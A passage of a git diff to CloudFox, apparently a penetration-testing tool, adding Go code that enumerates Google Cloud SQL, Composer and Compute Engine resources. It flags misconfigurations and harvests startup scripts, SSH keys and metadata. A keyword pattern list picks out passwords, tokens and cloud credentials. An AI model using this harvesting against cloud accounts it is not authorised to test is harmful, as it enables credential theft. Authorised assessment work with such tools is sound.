"github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + sqladmin "google.golang.org/api/sqladmin/v1" +) + +type CloudSQLService struct{ + session *gcpinternal.SafeSession +} + +func New() *CloudSQLService { + return &CloudSQLService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *CloudSQLService { + return &CloudSQLService{session: session} +} + +// getService returns a SQL Admin service, either cached from the session or a new one +func (cs *CloudSQLService) getService(ctx context.Context) (*sqladmin.Service, error) { + if cs.session != nil { + return sdk.CachedGetSQLAdminService(ctx, cs.session) + } + return sqladmin.NewService(ctx) +} + +// SQLInstanceInfo holds Cloud SQL instance details with security-relevant information +type SQLInstanceInfo struct { + // Basic info + Name string + ProjectID string + Region string + DatabaseVersion string + Tier string + State string + + // Network configuration + PublicIP string + PrivateIP string + HasPublicIP bool + AuthorizedNetworks []AuthorizedNetwork + RequireSSL bool + SSLMode string + + // Security configuration + ServiceAccountEmail string + RootPasswordSet bool + PasswordPolicyEnabled bool + IAMAuthentication bool + + // Backup configuration + BackupEnabled bool + BinaryLogEnabled bool + BackupLocation string + PointInTimeRecovery bool + RetentionDays int + + // Encryption + KMSKeyName string + EncryptionType string // Google-managed or CMEK + + // High Availability + AvailabilityType string // REGIONAL or ZONAL + FailoverReplica string + + // Maintenance + MaintenanceWindow string + + // Databases (if enumerated) + Databases []string + + // Security issues detected + SecurityIssues []string +} + +// AuthorizedNetwork represents a network authorized to connect +type AuthorizedNetwork struct { + Name string + Value string // CIDR + IsPublic bool // 0.0.0.0/0 or similar +} + +// Instances retrieves all Cloud SQL instances in a project +func (cs *CloudSQLService) Instances(projectID string) ([]SQLInstanceInfo, error) { + ctx := context.Background() + + service, err := cs.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sqladmin.googleapis.com") + } + + resp, err := service.Instances.List(projectID).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sqladmin.googleapis.com") + } + + var instances []SQLInstanceInfo + for _, instance := range resp.Items { + info := parseInstanceInfo(instance, projectID) + instances = append(instances, info) + } + + return instances, nil +} + +// parseInstanceInfo extracts security-relevant information from a Cloud SQL instance +func parseInstanceInfo(instance *sqladmin.DatabaseInstance, projectID string) SQLInstanceInfo { + info := SQLInstanceInfo{ + Name: instance.Name, + ProjectID: projectID, + DatabaseVersion: instance.DatabaseVersion, + State: instance.State, + SecurityIssues: []string{}, + } + + // Region from GCE zone + if instance.GceZone != "" { + // Zone format: us-central1-a -> extract region us-central1 + parts := strings.Split(instance.GceZone, "-") + if len(parts) >= 2 { + info.Region = parts[0] + "-" + parts[1] + } + } else if instance.Region != "" { + info.Region = instance.Region + } + + // Settings + if instance.Settings != nil { + info.Tier = instance.Settings.Tier + info.AvailabilityType = instance.Settings.AvailabilityType + + // IP configuration + if instance.Settings.IpConfiguration != nil { + ipConfig := instance.Settings.IpConfiguration + info.RequireSSL = ipConfig.RequireSsl + info.SSLMode = ipConfig.SslMode + info.IAMAuthentication = ipConfig.EnablePrivatePathForGoogleCloudServices + + // Check for private IP + if ipConfig.PrivateNetwork != "" { + info.HasPublicIP = ipConfig.Ipv4Enabled + } else { + info.HasPublicIP = true // Default is public + } + + // Parse authorized networks + for _, network := range ipConfig.AuthorizedNetworks { + an := AuthorizedNetwork{ + Name: network.Name, + Value: network.Value, + } + // Check if network is public (0.0.0.0/0 or similar broad ranges) + if network.Value == "0.0.0.0/0" || + network.Value == "0.0.0.0/1" || + network.Value == "128.0.0.0/1" { + an.IsPublic = true + } + info.AuthorizedNetworks = append(info.AuthorizedNetworks, an) + } + } + + // Backup configuration + if instance.Settings.BackupConfiguration != nil { + backup := instance.Settings.BackupConfiguration + info.BackupEnabled = backup.Enabled + info.BinaryLogEnabled = backup.BinaryLogEnabled + info.BackupLocation = backup.Location + info.PointInTimeRecovery = backup.PointInTimeRecoveryEnabled + info.RetentionDays = int(backup.TransactionLogRetentionDays) + } + + // Password policy + if instance.Settings.PasswordValidationPolicy != nil { + info.PasswordPolicyEnabled = instance.Settings.PasswordValidationPolicy.EnablePasswordPolicy + } + + // Maintenance window + if instance.Settings.MaintenanceWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Day %d, Hour %d", + instance.Settings.MaintenanceWindow.Day, + instance.Settings.MaintenanceWindow.Hour) + } + + // Database flags (can reveal security settings) + // These could be parsed for specific security-relevant flags + } + + // IP addresses + for _, ip := range instance.IpAddresses { + switch ip.Type { + case "PRIMARY": + info.PublicIP = ip.IpAddress + case "PRIVATE": + info.PrivateIP = ip.IpAddress + } + } + + // Service account + info.ServiceAccountEmail = instance.ServiceAccountEmailAddress + + // Disk encryption + if instance.DiskEncryptionConfiguration != nil { + info.KMSKeyName = instance.DiskEncryptionConfiguration.KmsKeyName + if info.KMSKeyName != "" { + info.EncryptionType = "CMEK" + } else { + info.EncryptionType = "Google-managed" + } + } else { + info.EncryptionType = "Google-managed" + } + + // Failover replica + if instance.FailoverReplica != nil { + info.FailoverReplica = instance.FailoverReplica.Name + } + + // Identify security issues + info.SecurityIssues = identifySecurityIssues(info) + + return info +} + +// identifySecurityIssues checks for common security misconfigurations +func identifySecurityIssues(instance SQLInstanceInfo) []string { + var issues []string + + // Public IP enabled + if instance.HasPublicIP { + issues = append(issues, "Public IP enabled") + } + + // Public IP without SSL requirement + if instance.HasPublicIP && !instance.RequireSSL { + issues = append(issues, "Public IP without SSL requirement") + } + + // Authorized networks include 0.0.0.0/0 + for _, network := range instance.AuthorizedNetworks { + if network.IsPublic { + issues = append(issues, fmt.Sprintf("Authorized network allows all IPs: %s", network.Value)) + } + } + + // No authorized networks but public IP (potentially open to all) + if instance.HasPublicIP && len(instance.AuthorizedNetworks) == 0 { + issues = append(issues, "Public IP with no authorized networks (blocked by default, but verify)") + } + + // Backups not enabled + if !instance.BackupEnabled { + issues = append(issues, "Automated backups not enabled") + } + + // Point-in-time recovery not enabled + if !instance.PointInTimeRecovery && instance.BackupEnabled { + issues = append(issues, "Point-in-time recovery not enabled") + } + + // Using Google-managed encryption (not CMEK) + if instance.EncryptionType == "Google-managed" { + // This is informational, not necessarily an issue + // issues = append(issues, "Using Google-managed encryption (not CMEK)") + } + + // Single zone deployment + if instance.AvailabilityType == "ZONAL" { + issues = append(issues, "Single zone deployment (no HA)") + } + + // Password policy not enabled + if !instance.PasswordPolicyEnabled { + issues = append(issues, "Password validation policy not enabled") + } + + return issues +} diff --git a/gcp/services/composerService/composerService.go b/gcp/services/composerService/composerService.go new file mode 100644 index 00000000..2ab7ab23 --- /dev/null +++ b/gcp/services/composerService/composerService.go @@ -0,0 +1,205 @@ +package composerservice + +import ( + "context" + "fmt" + "strings" + "sync" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + composer "google.golang.org/api/composer/v1" +) + +type ComposerService struct { + session *gcpinternal.SafeSession +} + +func New() *ComposerService { + return &ComposerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *ComposerService { + return &ComposerService{session: session} +} + +// getService returns a Composer service client using cached session if available +func (s *ComposerService) getService(ctx context.Context) (*composer.Service, error) { + if s.session != nil { + return sdk.CachedGetComposerService(ctx, s.session) + } + return composer.NewService(ctx) +} + +// EnvironmentInfo represents a Cloud Composer environment +type EnvironmentInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Airflow config + AirflowURI string `json:"airflowUri"` + DagGcsPrefix string `json:"dagGcsPrefix"` + AirflowVersion string `json:"airflowVersion"` + PythonVersion string `json:"pythonVersion"` + ImageVersion string `json:"imageVersion"` + + // Node config + MachineType string `json:"machineType"` + DiskSizeGb int64 `json:"diskSizeGb"` + NodeCount int64 `json:"nodeCount"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + ServiceAccount string `json:"serviceAccount"` + + // Security config + PrivateEnvironment bool `json:"privateEnvironment"` + WebServerAllowedIPs []string `json:"webServerAllowedIps"` + EnablePrivateEndpoint bool `json:"enablePrivateEndpoint"` +} + +// ListEnvironments retrieves all Composer environments in a project across all regions +// Note: The Cloud Composer API does NOT support the "-" wildcard for locations +// so we must iterate through regions explicitly +func (s *ComposerService) ListEnvironments(projectID string) ([]EnvironmentInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "composer.googleapis.com") + } + + var environments []EnvironmentInfo + var mu sync.Mutex + var wg sync.WaitGroup + var lastErr error + var errMu sync.Mutex + + // Use a semaphore to limit concurrent API calls + semaphore := make(chan struct{}, 10) // Max 10 concurrent requests + + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + + // Iterate through all Composer regions in parallel + for _, region := range regions { + wg.Add(1) + go func(region string) { + defer wg.Done() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, region) + req := service.Projects.Locations.Environments.List(parent) + err := req.Pages(ctx, func(page *composer.ListEnvironmentsResponse) error { + for _, env := range page.Environments { + info := s.parseEnvironment(env, projectID) + mu.Lock() + environments = append(environments, info) + mu.Unlock() + } + return nil + }) + + if err != nil { + // Track the last error but continue - region may not have environments or API may not be enabled + errMu.Lock() + lastErr = err + errMu.Unlock() + } + }(region) + } + + wg.Wait() + + // Only return error if we got no environments AND had errors + // If we found environments in some regions, that's success + if len(environments) == 0 && lastErr != nil { + return nil, gcpinternal.ParseGCPError(lastErr, "composer.googleapis.com") + } + + return environments, nil +} + +// parseEnvironment converts a Composer environment to EnvironmentInfo +func (s *ComposerService) parseEnvironment(env *composer.Environment, projectID string) EnvironmentInfo { + info := EnvironmentInfo{ + Name: extractName(env.Name), + ProjectID: projectID, + Location: extractLocation(env.Name), + State: env.State, + CreateTime: env.CreateTime, + UpdateTime: env.UpdateTime, + } + + if env.Config != nil { + // Airflow config + if env.Config.AirflowUri != "" { + info.AirflowURI = env.Config.AirflowUri + } + info.DagGcsPrefix = env.Config.DagGcsPrefix + + // Software config + if env.Config.SoftwareConfig != nil { + info.ImageVersion = env.Config.SoftwareConfig.ImageVersion + info.PythonVersion = env.Config.SoftwareConfig.PythonVersion + // Extract Airflow version from ImageVersion (format: composer-X.Y.Z-airflow-A.B.C) + if env.Config.SoftwareConfig.ImageVersion != "" { + info.AirflowVersion = env.Config.SoftwareConfig.ImageVersion + } + } + + // Node config + if env.Config.NodeConfig != nil { + info.MachineType = env.Config.NodeConfig.MachineType + info.DiskSizeGb = env.Config.NodeConfig.DiskSizeGb + info.Network = env.Config.NodeConfig.Network + info.Subnetwork = env.Config.NodeConfig.Subnetwork + info.ServiceAccount = env.Config.NodeConfig.ServiceAccount + } + + info.NodeCount = env.Config.NodeCount + + // Private environment config + if env.Config.PrivateEnvironmentConfig != nil { + info.PrivateEnvironment = env.Config.PrivateEnvironmentConfig.EnablePrivateEnvironment + // EnablePrivateEndpoint is part of PrivateClusterConfig, not PrivateEnvironmentConfig + if env.Config.PrivateEnvironmentConfig.PrivateClusterConfig != nil { + info.EnablePrivateEndpoint = env.Config.PrivateEnvironmentConfig.PrivateClusterConfig.EnablePrivateEndpoint + } + } + + // Web server network access control + if env.Config.WebServerNetworkAccessControl != nil { + for _, cidr := range env.Config.WebServerNetworkAccessControl.AllowedIpRanges { + info.WebServerAllowedIPs = append(info.WebServerAllowedIPs, cidr.Value) + } + } + } + + return info +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLocation(fullName string) string { + parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/computeEngineService/computeEngineService.go b/gcp/services/computeEngineService/computeEngineService.go index bcff7739..a63b3168 100644 --- a/gcp/services/computeEngineService/computeEngineService.go +++ b/gcp/services/computeEngineService/computeEngineService.go @@ -5,68 +5,279 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/compute/v1" ) type ComputeEngineService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new ComputeEngineService (legacy - uses ADC directly) func New() *ComputeEngineService { return &ComputeEngineService{} } +// NewWithSession creates a ComputeEngineService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *ComputeEngineService { + return &ComputeEngineService{session: session} +} + +// ServiceAccountInfo contains service account details for an instance +type ServiceAccountInfo struct { + Email string `json:"email"` + Scopes []string `json:"scopes"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// InstanceType represents the type/manager of an instance +type InstanceType string + +const ( + InstanceTypeStandalone InstanceType = "Standalone" // Regular VM + InstanceTypeGKE InstanceType = "GKE" // GKE node + InstanceTypeMIG InstanceType = "MIG" // Managed Instance Group + InstanceTypeDataproc InstanceType = "Dataproc" // Dataproc cluster node + InstanceTypeDataflow InstanceType = "Dataflow" // Dataflow worker + InstanceTypeComposer InstanceType = "Composer" // Cloud Composer worker + InstanceTypeNotebooks InstanceType = "Notebooks" // Vertex AI Workbench / AI Platform Notebooks + InstanceTypeBatchJob InstanceType = "Batch" // Cloud Batch job + InstanceTypeCloudRun InstanceType = "CloudRun" // Cloud Run (Jobs) execution environment + InstanceTypeFilestore InstanceType = "Filestore" // Filestore instance + InstanceTypeSQLProxy InstanceType = "CloudSQL" // Cloud SQL Proxy + InstanceTypeAppEngine InstanceType = "AppEngine" // App Engine Flex +) + +// ComputeEngineInfo contains instance metadata and security-relevant configuration type ComputeEngineInfo struct { - Name string - ID string - Zone string - State string - ExternalIP string - InternalIP string - ServiceAccounts []*compute.ServiceAccount // Assuming role is derived from service accounts - NetworkInterfaces []*compute.NetworkInterface - Tags *compute.Tags - ProjectID string + // Basic info + Name string `json:"name"` + ID string `json:"id"` + Zone string `json:"zone"` + State string `json:"state"` + ProjectID string `json:"projectID"` + InstanceType InstanceType `json:"instanceType"` // Type of instance (GKE, MIG, Dataproc, etc.) + + // Network configuration + ExternalIP string `json:"externalIP"` + InternalIP string `json:"internalIP"` + NetworkInterfaces []*compute.NetworkInterface `json:"networkInterfaces"` + CanIPForward bool `json:"canIpForward"` // Can forward packets (router/NAT) + + // Service accounts and scopes + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + HasDefaultSA bool `json:"hasDefaultSA"` // Uses default compute SA + HasCloudScopes bool `json:"hasCloudScopes"` // Has cloud-platform or other broad scopes + + // Security configuration + DeletionProtection bool `json:"deletionProtection"` // Protected against deletion + ShieldedVM bool `json:"shieldedVM"` // Shielded VM enabled + SecureBoot bool `json:"secureBoot"` // Secure Boot enabled + VTPMEnabled bool `json:"vtpmEnabled"` // vTPM enabled + IntegrityMonitoring bool `json:"integrityMonitoring"` // Integrity monitoring enabled + ConfidentialVM bool `json:"confidentialVM"` // Confidential computing enabled + + // Instance metadata + MachineType string `json:"machineType"` + Tags *compute.Tags `json:"tags"` + Labels map[string]string `json:"labels"` + + // Metadata security + HasStartupScript bool `json:"hasStartupScript"` // Has startup script in metadata + HasSSHKeys bool `json:"hasSSHKeys"` // Has SSH keys in metadata + BlockProjectSSHKeys bool `json:"blockProjectSSHKeys"` // Blocks project-wide SSH keys + OSLoginEnabled bool `json:"osLoginEnabled"` // OS Login enabled + OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` // OS Login 2FA enabled + SerialPortEnabled bool `json:"serialPortEnabled"` // Serial port access enabled + + // Pentest-specific fields: actual content extraction + StartupScriptContent string `json:"startupScriptContent"` // Actual startup script content + StartupScriptURL string `json:"startupScriptURL"` // URL to startup script if remote + SSHKeys []string `json:"sshKeys"` // Extracted SSH keys + CustomMetadata []string `json:"customMetadata"` // Other custom metadata keys + RawMetadata map[string]string `json:"rawMetadata"` // Full raw metadata key-value pairs + SensitiveMetadata []SensitiveItem `json:"sensitiveMetadata"` // Detected sensitive items in metadata + + // Disk encryption + BootDiskEncryption string `json:"bootDiskEncryption"` // "Google-managed", "CMEK", or "CSEK" + BootDiskKMSKey string `json:"bootDiskKMSKey"` // KMS key for CMEK + + // Timestamps + CreationTimestamp string `json:"creationTimestamp"` + LastStartTimestamp string `json:"lastStartTimestamp"` + LastSnapshotDate string `json:"lastSnapshotDate"` // Most recent snapshot date for any attached disk + + // IAM bindings + IAMBindings []IAMBinding `json:"iamBindings"` } -// Retrieves instances from all regions and zones for a project without using concurrency. -func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInfo, error) { +// ProjectMetadataInfo contains project-level metadata security info +type ProjectMetadataInfo struct { + ProjectID string `json:"projectId"` + HasProjectSSHKeys bool `json:"hasProjectSSHKeys"` + ProjectSSHKeys []string `json:"projectSSHKeys"` + HasProjectStartupScript bool `json:"hasProjectStartupScript"` + ProjectStartupScript string `json:"projectStartupScript"` + OSLoginEnabled bool `json:"osLoginEnabled"` + OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` + SerialPortEnabled bool `json:"serialPortEnabled"` + CustomMetadataKeys []string `json:"customMetadataKeys"` + RawMetadata map[string]string `json:"rawMetadata"` + SensitiveMetadata []SensitiveItem `json:"sensitiveMetadata"` +} + +// InstanceIAMInfo contains IAM policy info for an instance +type InstanceIAMInfo struct { + InstanceName string `json:"instanceName"` + Zone string `json:"zone"` + ProjectID string `json:"projectId"` + ComputeAdmins []string `json:"computeAdmins"` // compute.admin or owner + InstanceAdmins []string `json:"instanceAdmins"` // compute.instanceAdmin + SSHUsers []string `json:"sshUsers"` // compute.osLogin or osAdminLogin + MetadataSetters []string `json:"metadataSetters"` // compute.instances.setMetadata +} + +// getService returns a compute service, using session if available +func (ces *ComputeEngineService) getService(ctx context.Context) (*compute.Service, error) { + if ces.session != nil { + return sdk.CachedGetComputeService(ctx, ces.session) + } + return compute.NewService(ctx) +} + +// getInstanceIAMBindings retrieves all IAM bindings for an instance +func (ces *ComputeEngineService) getInstanceIAMBindings(service *compute.Service, projectID, zone, instanceName string) []IAMBinding { ctx := context.Background() - computeService, err := compute.NewService(ctx) + + policy, err := service.Instances.GetIamPolicy(projectID, zone, instanceName).Context(ctx).Do() if err != nil { - return nil, err + return nil } - regions, err := computeService.Regions.List(projectID).Do() + var bindings []IAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +// Retrieves instances from all regions and zones for a project without using concurrency. +func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInfo, error) { + ctx := context.Background() + computeService, err := ces.getService(ctx) if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } + // Use AggregatedList to get all instances across all zones in one call + // This only requires compute.instances.list permission (not compute.regions.list) var instanceInfos []ComputeEngineInfo - for _, region := range regions.Items { - for _, zoneURL := range region.Zones { - zone := getZoneNameFromURL(zoneURL) - instanceList, err := computeService.Instances.List(projectID, zone).Do() - if err != nil { - return nil, fmt.Errorf("error retrieving instances from zone %s: %v", zone, err) - } - for _, instance := range instanceList.Items { + + req := computeService.Instances.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.Instances == nil { + continue + } + // Extract zone from scope name (format: "zones/us-central1-a") + zone := "" + if strings.HasPrefix(scopeName, "zones/") { + zone = strings.TrimPrefix(scopeName, "zones/") + } + + for _, instance := range scopedList.Instances { info := ComputeEngineInfo{ - Name: instance.Name, - ID: fmt.Sprintf("%v", instance.Id), - Zone: zoneURL, - State: instance.Status, - ExternalIP: getExternalIP(instance), - InternalIP: getInternalIP(instance), - ServiceAccounts: instance.ServiceAccounts, - NetworkInterfaces: instance.NetworkInterfaces, - Tags: instance.Tags, - ProjectID: projectID, + Name: instance.Name, + ID: fmt.Sprintf("%v", instance.Id), + Zone: zone, + State: instance.Status, + InstanceType: detectInstanceType(instance), + ExternalIP: getExternalIP(instance), + InternalIP: getInternalIP(instance), + NetworkInterfaces: instance.NetworkInterfaces, + CanIPForward: instance.CanIpForward, + Tags: instance.Tags, + Labels: instance.Labels, + ProjectID: projectID, + DeletionProtection: instance.DeletionProtection, + CreationTimestamp: instance.CreationTimestamp, + LastStartTimestamp: instance.LastStartTimestamp, + } + + // Parse machine type (extract just the type name) + info.MachineType = getMachineTypeName(instance.MachineType) + + // Parse service accounts and scopes + info.ServiceAccounts, info.HasDefaultSA, info.HasCloudScopes = parseServiceAccounts(instance.ServiceAccounts, projectID) + + // Parse shielded VM config + if instance.ShieldedInstanceConfig != nil { + info.ShieldedVM = true + info.SecureBoot = instance.ShieldedInstanceConfig.EnableSecureBoot + info.VTPMEnabled = instance.ShieldedInstanceConfig.EnableVtpm + info.IntegrityMonitoring = instance.ShieldedInstanceConfig.EnableIntegrityMonitoring } + + // Parse confidential VM config + if instance.ConfidentialInstanceConfig != nil { + info.ConfidentialVM = instance.ConfidentialInstanceConfig.EnableConfidentialCompute + } + + // Parse metadata for security-relevant items including content + if instance.Metadata != nil { + metaResult := parseMetadataFull(instance.Metadata) + info.HasStartupScript = metaResult.HasStartupScript + info.HasSSHKeys = metaResult.HasSSHKeys + info.BlockProjectSSHKeys = metaResult.BlockProjectSSHKeys + info.OSLoginEnabled = metaResult.OSLoginEnabled + info.OSLogin2FAEnabled = metaResult.OSLogin2FA + info.SerialPortEnabled = metaResult.SerialPortEnabled + info.StartupScriptContent = metaResult.StartupScriptContent + info.StartupScriptURL = metaResult.StartupScriptURL + info.SSHKeys = metaResult.SSHKeys + info.CustomMetadata = metaResult.CustomMetadata + info.RawMetadata = metaResult.RawMetadata + // Mark source for sensitive items + for i := range metaResult.SensitiveItems { + metaResult.SensitiveItems[i].Source = "instance" + } + info.SensitiveMetadata = metaResult.SensitiveItems + } + + // Parse boot disk encryption + info.BootDiskEncryption, info.BootDiskKMSKey = parseBootDiskEncryption(instance.Disks) + + // Get last snapshot date for this instance's disks + info.LastSnapshotDate = ces.getLastSnapshotForDisks(computeService, projectID, instance.Disks) + + // Fetch IAM bindings for this instance (may fail silently if no permission) + info.IAMBindings = ces.getInstanceIAMBindings(computeService, projectID, zone, instance.Name) + instanceInfos = append(instanceInfos, info) } } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } + return instanceInfos, nil } @@ -96,4 +307,753 @@ func getInternalIP(instance *compute.Instance) string { return "" } -// TODO consider just getting the emails of the service account and returning a []string +// getMachineTypeName extracts the machine type name from a full URL +func getMachineTypeName(machineTypeURL string) string { + parts := strings.Split(machineTypeURL, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return machineTypeURL +} + +// parseServiceAccounts extracts service account info and checks for security concerns +func parseServiceAccounts(sas []*compute.ServiceAccount, projectID string) ([]ServiceAccountInfo, bool, bool) { + var accounts []ServiceAccountInfo + hasDefaultSA := false + hasCloudScopes := false + + defaultSAPattern := fmt.Sprintf("%s-compute@developer.gserviceaccount.com", projectID) + + for _, sa := range sas { + info := ServiceAccountInfo{ + Email: sa.Email, + Scopes: sa.Scopes, + } + accounts = append(accounts, info) + + // Check if using default compute service account + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") || + strings.HasSuffix(sa.Email, defaultSAPattern) { + hasDefaultSA = true + } + + // Check for broad scopes + for _, scope := range sa.Scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" || + scope == "https://www.googleapis.com/auth/compute" || + scope == "https://www.googleapis.com/auth/devstorage.full_control" || + scope == "https://www.googleapis.com/auth/devstorage.read_write" { + hasCloudScopes = true + } + } + } + + return accounts, hasDefaultSA, hasCloudScopes +} + +// SensitiveItem represents a potentially sensitive metadata item +type SensitiveItem struct { + Key string `json:"key"` + Value string `json:"value"` + Type string `json:"type"` // password, api-key, token, credential, connection-string, secret, env-var + Source string `json:"source"` // instance, project, or specific like "instance:user-data" + MetadataKey string `json:"metadataKey"` // The metadata key where this was found (e.g., user-data, startup-script) +} + +// MetadataParseResult contains all parsed metadata fields +type MetadataParseResult struct { + HasStartupScript bool + HasSSHKeys bool + BlockProjectSSHKeys bool + OSLoginEnabled bool + OSLogin2FA bool + SerialPortEnabled bool + StartupScriptContent string + StartupScriptURL string + SSHKeys []string + CustomMetadata []string + RawMetadata map[string]string + SensitiveItems []SensitiveItem +} + +// parseMetadata checks instance metadata for security-relevant settings +func parseMetadata(metadata *compute.Metadata) (hasStartupScript, hasSSHKeys, blockProjectSSHKeys, osLoginEnabled, osLogin2FA, serialPortEnabled bool) { + result := parseMetadataFull(metadata) + return result.HasStartupScript, result.HasSSHKeys, result.BlockProjectSSHKeys, + result.OSLoginEnabled, result.OSLogin2FA, result.SerialPortEnabled +} + +// sensitivePatterns maps key name patterns to secret types +// These are checked with contains matching, so they should be specific enough to avoid false positives +var sensitivePatterns = map[string]string{ + // Passwords - high confidence patterns that end with PASSWORD/PASSWD/PWD + "_PASSWORD": "password", + "_PASSWD": "password", + "_PWD": "password", + "_PASS": "password", + + // Secrets - patterns that explicitly contain SECRET + "_SECRET": "secret", + "SECRET_KEY": "secret", + "APP_SECRET": "secret", + "JWT_SECRET": "secret", + + // API Keys - explicit API key patterns + "API_KEY": "api-key", + "APIKEY": "api-key", + "_APIKEY": "api-key", + "API_SECRET": "api-key", + + // Tokens - explicit token patterns (must have _TOKEN suffix or TOKEN_ prefix to be specific) + "_TOKEN": "token", + "TOKEN_": "token", + "ACCESS_TOKEN": "token", + "AUTH_TOKEN": "token", + "BEARER_": "token", + + // Private keys + "PRIVATE_KEY": "credential", + "PRIVATEKEY": "credential", + "_PRIVKEY": "credential", + + // Connection strings - explicit patterns + "CONNECTION_STRING": "connection-string", + "DATABASE_URL": "connection-string", + "MONGODB_URI": "connection-string", + "_CONN_STR": "connection-string", + + // Cloud provider credentials - very specific patterns + "AWS_SECRET_ACCESS_KEY": "credential", + "AWS_SESSION_TOKEN": "credential", + "AZURE_CLIENT_SECRET": "credential", + "GOOGLE_CREDENTIALS": "credential", + + // OAuth - specific patterns + "CLIENT_SECRET": "credential", + "CONSUMER_SECRET": "credential", + "OAUTH_SECRET": "credential", +} + +// detectSensitiveType checks if a key name matches sensitive patterns +func detectSensitiveType(key string) string { + keyUpper := strings.ToUpper(key) + for pattern, secretType := range sensitivePatterns { + if strings.Contains(keyUpper, pattern) { + return secretType + } + } + return "" +} + +// parseMetadataFull extracts all metadata including content +func parseMetadataFull(metadata *compute.Metadata) MetadataParseResult { + result := MetadataParseResult{ + RawMetadata: make(map[string]string), + } + if metadata == nil || metadata.Items == nil { + return result + } + + // Known metadata keys to exclude from custom metadata + knownKeys := map[string]bool{ + "startup-script": true, + "startup-script-url": true, + "ssh-keys": true, + "sshKeys": true, + "block-project-ssh-keys": true, + "enable-oslogin": true, + "enable-oslogin-2fa": true, + "serial-port-enable": true, + "google-compute-default-zone": true, + "google-compute-default-region": true, + } + + for _, item := range metadata.Items { + if item == nil { + continue + } + + // Store all raw metadata (except ssh-keys which go to separate loot) + if item.Value != nil && item.Key != "ssh-keys" && item.Key != "sshKeys" { + result.RawMetadata[item.Key] = *item.Value + } + + // Check ALL metadata keys for sensitive patterns (not just custom ones) + if item.Value != nil { + if sensitiveType := detectSensitiveType(item.Key); sensitiveType != "" { + result.SensitiveItems = append(result.SensitiveItems, SensitiveItem{ + Key: item.Key, + Value: *item.Value, + Type: sensitiveType, + MetadataKey: item.Key, // The key itself is the metadata key + }) + } + // Also scan metadata VALUES for embedded env vars (e.g., VAR=value patterns) + valueItems := extractSensitiveFromScript(*item.Value, "metadata-value:"+item.Key) + result.SensitiveItems = append(result.SensitiveItems, valueItems...) + } + + switch item.Key { + case "startup-script": + result.HasStartupScript = true + if item.Value != nil { + result.StartupScriptContent = *item.Value + // Check startup script for sensitive patterns (env vars inside script) + sensitiveItems := extractSensitiveFromScript(*item.Value, "startup-script") + result.SensitiveItems = append(result.SensitiveItems, sensitiveItems...) + } + case "startup-script-url": + result.HasStartupScript = true + if item.Value != nil { + result.StartupScriptURL = *item.Value + } + case "ssh-keys", "sshKeys": + result.HasSSHKeys = true + if item.Value != nil { + // Parse SSH keys - format is "user:ssh-rsa KEY comment" + lines := strings.Split(*item.Value, "\n") + for _, line := range lines { + line = strings.TrimSpace(line) + if line != "" { + result.SSHKeys = append(result.SSHKeys, line) + } + } + } + case "block-project-ssh-keys": + if item.Value != nil && *item.Value == "true" { + result.BlockProjectSSHKeys = true + } + case "enable-oslogin": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + result.OSLoginEnabled = true + } + case "enable-oslogin-2fa": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + result.OSLogin2FA = true + } + case "serial-port-enable": + if item.Value != nil && *item.Value == "true" { + result.SerialPortEnabled = true + } + default: + // Track custom metadata keys + if !knownKeys[item.Key] { + result.CustomMetadata = append(result.CustomMetadata, item.Key) + } + } + } + + return result +} + +// extractSensitiveFromScript scans content for sensitive variable assignments +// Focuses on explicit VAR=value patterns to minimize false positives +// source format: "metadata-value:KEY_NAME" or "startup-script" or "project-startup-script" +func extractSensitiveFromScript(content, source string) []SensitiveItem { + var items []SensitiveItem + seen := make(map[string]bool) // Deduplicate findings + + // Parse the metadata key from the source + metadataKey := source + if strings.HasPrefix(source, "metadata-value:") { + metadataKey = strings.TrimPrefix(source, "metadata-value:") + } + + lines 